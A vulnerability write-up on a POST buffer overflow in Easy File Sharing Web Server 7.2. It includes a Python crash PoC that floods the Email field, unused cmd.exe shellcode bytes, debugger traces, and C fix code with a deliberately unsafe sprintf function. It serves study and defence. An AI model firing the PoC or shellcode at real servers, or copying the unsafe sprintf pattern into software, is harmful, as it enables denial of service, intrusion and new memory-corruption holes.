Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow Vulnerability Analysis

Introduction

This software again: wasn't there already a buffer overflow in the GET request?
(My analysis of that one is here: http://blog.csdn.net/u012763794/article/details/66970749)

This time there is a POST variant, so let's see whether it brings anything new.

Reference: https://www.exploit-db.com/exploits/42165/

Lab Environment

WinXP SP3 (Chinese edition)
EFS Web Server 7.2
windbg
IDA
mona
python 2.7

Vulnerability Analysis

Trim the exploit down to a PoC (Python 2, matching the lab environment):

import httplib

server = "127.0.0.1"

# Shellcode carried over from the original exploit (opens cmd.exe).
# It is not used by this PoC, which only sends a long run of 'A' bytes
# to reproduce the crash.
shellcode = (
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0")

# 5000 bytes of 'A' as the value of the Email field
payload = "A" * 5000

# Server address and port
httpServ = httplib.HTTPConnection(server, 80)
httpServ.connect()

# POST the oversized Email field to the password-recovery handler
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % payload)

response = httpServ.getresponse()

httpServ.close()

First, reproduce the crash:

0:005> g
(1110.1290): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000001 ecx=ffffffff edx=020561b8 esi=02056198 edi=020561b8
eip=61c277f6 esp=02056114 ebp=0205612c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll - 
sqlite3!sqlite3_errcode+0x8e:
61c277f6 81784c97a629a0  cmp     dword ptr [eax+4Ch],0A029A697h ds:0023:4141418d=????????

At a glance the crash location is the same as last time: sqlite3!sqlite3_errcode+0x8e.

Look at the stack:

0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0205612c 61c6286c 000013ad 00001388 01568ea4 sqlite3!sqlite3_errcode+0x8e
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0205616c 004968f4 00000001 00000000 02056198 sqlite3!sqlite3_declare_vtab+0x3282
0205618c 004975a3 020561b0 00000000 0012b9d0 fsws+0x968f4
00000000 00000000 00000000 00000000 00000000 fsws+0x975a3

This looks much like last time, so set a breakpoint directly at 0049759E:

0:002> bp 0049759E
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0:002> bl
 0 e 0049759e     0001 (0001)  0:**** fsws+0x9759e
0:002> g
ModLoad: 719c0000 719fe000   C:\WINDOWS\System32\mswsock.dll
ModLoad: 76ef0000 76f17000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 76d30000 76d48000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 76f80000 76f88000   C:\WINDOWS\System32\winrnr.dll
ModLoad: 76f90000 76f96000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 01a10000 01a20000   C:\WINDOWS\DBFilter.dll
ModLoad: 01a20000 01c4c000   C:\WINDOWS\SurfGd.dll
ModLoad: 60fd0000 61025000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a00000 71a08000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 5fdd0000 5fe24000   C:\WINDOWS\system32\NETAPI32.DLL
ModLoad: 68000000 68036000   C:\WINDOWS\system32\rsaenh.dll
Breakpoint 0 hit
eax=020561b0 ebx=ffffff01 ecx=0205720c edx=020561b8 esi=0205720c edi=01568eec
eip=0049759e esp=02056194 ebp=00000068 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
fsws+0x9759e:
0049759e e82df3ffff      call    fsws+0x968d0 (004968d0)
0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
02056190 020561b0 020561b8 0012b9d0 02057624 fsws+0x9759e
02056194 020561b8 0012b9d0 02057624 ffffffff 0x20561b0
020561b0 01375910 656c6573 2a207463 6f726620 0x20561b8
00000000 00000000 00000000 00000000 00000000 0x1375910
0:005> dc 020561b0 l 100
020561b0  00000000 01375910 656c6573 2a207463  .....Y7.select *
020561c0  6f726620 7173206d 6261746c 7720656c   from sqltable w
020561d0  65726568 616d6520 273d6c69 41414141  here email='AAAA
020561e0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
020561f0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056200  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056210  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056220  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056230  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056240  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
...

We can see that the first argument passed to the function at 0049759E points to an SQL statement, and that it already contains a lot of the AAAA... bytes we sent.

So when did the stack get filled like this? Set a write breakpoint on 020561e0:

0:005> ba w4 020561e0
0:005> g
Breakpoint 0 hit
eax=00000041 ebx=00001383 ecx=02056160 edx=020561e0 esi=01568e69 edi=02056134
eip=00500df0 esp=02055ebc ebp=02055ebc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
fsws+0x100df0:
00500df0 ff01            inc     dword ptr [ecx]      ds:0023:02056160=020561e0

Sure enough, it is the same thing as before: this is the write_char function, so the caller further up should be sprintf or something similar.

To confirm that, keep tracing; look at the stack first:

0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
02055ebc 00500e69 00000041 02056160 02056134 fsws+0x100df0
02056148 004f9698 02056160 005a2859 0205619c fsws+0x100e69
02056180 0049758f 020561b8 005a283c 01374678 fsws+0xf9698
02056184 020561b8 005a283c 01374678 01374358 fsws+0x9758f
02056188 005a283c 01374678 01374358 01568e64 0x20561b8
020561b8 2a207463 6f726620 7173206d 6261746c fsws+0x1a283c
020561bc 6f726620 7173206d 6261746c 7720656c 0x2a207463
020561c0 7173206d 6261746c 7720656c 65726568 0x6f726620
020561c4 6261746c 7720656c 65726568 616d6520 0x7173206d
020561c8 7720656c 65726568 616d6520 273d6c69 0x6261746c
02056220 00000000 00000000 00000000 00000000 COMCTL32!CReBar::_WndProc+0x955 (FPO: [Non-Fpo])

Check in IDA where 004f9698 lives: sure enough, it is inside sprintf, exactly as in the previous analysis.

.text:004F966A ; int sprintf(char *, const char *, ...)
.text:004F966A _sprintf        proc near               ; CODE XREF: sub_401520+36p
.text:004F966A                                         ; sub_401B70+35p ...
.text:004F966A
.text:004F966A var_20          = FILE ptr -20h
.text:004F966A arg_0           = dword ptr  8
.text:004F966A arg_4           = dword ptr  0Ch
.text:004F966A arg_8           = dword ptr  10h
.text:004F966A
.text:004F966A                 push    ebp
.text:004F966B                 mov     ebp, esp
.text:004F966D                 sub     esp, 20h
.text:004F9670                 mov     eax, [ebp+arg_0]
.text:004F9673                 push    esi
.text:004F9674                 mov     [ebp+var_20._base], eax
.text:004F9677                 mov     [ebp+var_20._ptr], eax
.text:004F967A                 lea     eax, [ebp+arg_8]
.text:004F967D                 mov     [ebp+var_20._flag], 42h
.text:004F9684                 push    eax             ; int
.text:004F9685                 lea     eax, [ebp+var_20]
.text:004F9688                 push    [ebp+arg_4]     ; int
.text:004F968B                 mov     [ebp+var_20._cnt], 7FFFFFFFh
.text:004F9692                 push    eax             ; FILE *
.text:004F9693                 call    sub_500640
.text:004F9698                 add     esp, 0Ch
...

Set a breakpoint just before the call to sprintf and examine the second argument, the format string. It contains three %s, so the fifth argument to sprintf is our Email value: AAAAAA.....

0:005> bp 0049758A
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0:005> g
Breakpoint 0 hit
eax=01374678 ebx=ffffff01 ecx=020561b8 edx=01374358 esi=0205720c edi=01568e64
eip=0049758a esp=02056188 ebp=00000068 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
fsws+0x9758a:
0049758a e8db200600      call    fsws+0xf966a (004f966a)
0:005> dd esp
02056188  020561b8 005a283c 01374678 01374358
02056198  01568e64 0012b9d0 02057624 ffffffff
020561a8  01374678 01374358 00000000 01375910
020561b8  0000005c 656c6573 2a207463 6f726620
020561c8  7173206d 6261746c 0020656c 00000000
020561d8  00000000 00000000 00000000 00000000
020561e8  00000000 00000000 00000000 00000000
020561f8  00000000 00000000 00000000 00000000
0:005> dc 005a283c l8
005a283c  656c6573 2a207463 6f726620 7325206d  select * from %s
005a284c  65687720 25206572 25273d73 00002773   where %s='%s'..
0:005> dc 01568e64 
01568e64  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e74  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e84  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e94  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ea4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568eb4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ec4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ed4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA

We can also check whether the first two %s arguments match what we saw in the value eax pointed to before the crash.

0:005> dc 01374678  l2
01374678  746c7173 656c6261                    sqltable

The table is indeed sqltable.

Below we can see that the field is email too; note the 00 byte that terminates it.

0:005> dc 01374358 l2
01374358  69616d65 452d006c                    email.-E

Exploitation

I have already covered this at length here:
http://blog.csdn.net/u012763794/article/details/66970749

Fix

Use the bounded snprintf instead of sprintf, or limit the length of the user-supplied string before it is formatted into the fixed-size buffer.
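The pattern the analysis uncovered is sprintf writing "select * from %s where %s='%s'" into a fixed-size stack buffer with an unbounded Email value as the third %s. The following added example (my own code, not from EFS or the exploit) shows that pattern next to a hardened builder that applies both fixes from the section above: it rejects input longer than a chosen limit and uses snprintf, treating a truncated result as an error rather than silently returning a partial query. The table and field names sqltable and email come from the debugger output on this page; MAX_FIELD_LEN, the 256-byte buffer and the sample address are assumptions of the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Format string recovered from the page: select * from %s where %s='%s' */
#define QUERY_FMT "select * from %s where %s='%s'"

/* Upper bound on one user-supplied field. The value is this example's
   choice (an assumption), not a limit taken from EFS. */
#define MAX_FIELD_LEN 128

/* Vulnerable pattern as the page describes it: fixed-size destination,
   unbounded sprintf. Shown for contrast only; never call it with
   untrusted input, and never with a value longer than the destination. */
void build_query_unsafe(char *out, const char *table,
                        const char *field, const char *value)
{
    sprintf(out, QUERY_FMT, table, field, value); /* overflows out on a long value */
}

/* Hardened builder. Returns 0 on success, -1 on invalid or overlong
   input, -2 if the formatted query did not fit in out (out is then
   emptied so a caller cannot use a truncated query by mistake). */
int build_query_safe(char *out, size_t out_len, const char *table,
                     const char *field, const char *value)
{
    if (out == NULL || out_len == 0)
        return -1;
    out[0] = '\0';
    if (table == NULL || field == NULL || value == NULL)
        return -1;
    if (strlen(value) > MAX_FIELD_LEN)       /* length limit before formatting */
        return -1;

    int n = snprintf(out, out_len, QUERY_FMT, table, field, value);
    if (n < 0 || (size_t)n >= out_len) {     /* error or truncated: refuse */
        out[0] = '\0';
        return -2;
    }
    return 0;
}

/* Builds a value of n 'A' bytes, like the PoC payload, and runs it through
   build_query_safe with a destination of out_len bytes (capped at 256).
   Returns the builder's result code. */
int safe_builder_result(size_t n, size_t out_len)
{
    char out[256];
    if (out_len > sizeof out)
        out_len = sizeof out;
    char *value = malloc(n + 1);
    if (value == NULL)
        return -1;
    memset(value, 'A', n);
    value[n] = '\0';
    int rc = build_query_safe(out, out_len, "sqltable", "email", value);
    free(value);
    return rc;
}

/* Query built for a constructed, normal-looking address (static buffer). */
const char *example_query(void)
{
    static char out[256];
    if (build_query_safe(out, sizeof out, "sqltable", "email",
                         "user@example.com") != 0)
        return NULL;
    return out;
}

int main(void)
{
    printf("normal input : rc=0 query=%s\n", example_query());
    printf("5000 x 'A'   : rc=%d (rejected by the length limit)\n",
           safe_builder_result(5000, 256));
    printf("100 x 'A'/64 : rc=%d (does not fit, truncated result refused)\n",
           safe_builder_result(100, 64));
    return 0;
}
```

Two details matter in practice: snprintf alone returns the length the full string would have needed, so a caller that ignores its return value still ends up with a silently truncated query, which is why the code checks n against out_len. And the length limit only closes the overflow; the query is still assembled by string formatting from a request parameter, so a real fix would also move to a parameterized statement.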

Summary

Revisiting this shows that every place in this software that uses sprintf may have the same problem; all that is needed is a way to reach it, and exploitation is much the same each time.
Also, whether you overwrite the return address or the SEH record, exploitation has its pitfalls; for more, see the exploitation section of http://blog.csdn.net/u012763794/article/details/66970749.

Posted by SEC.VIP_网络安全服务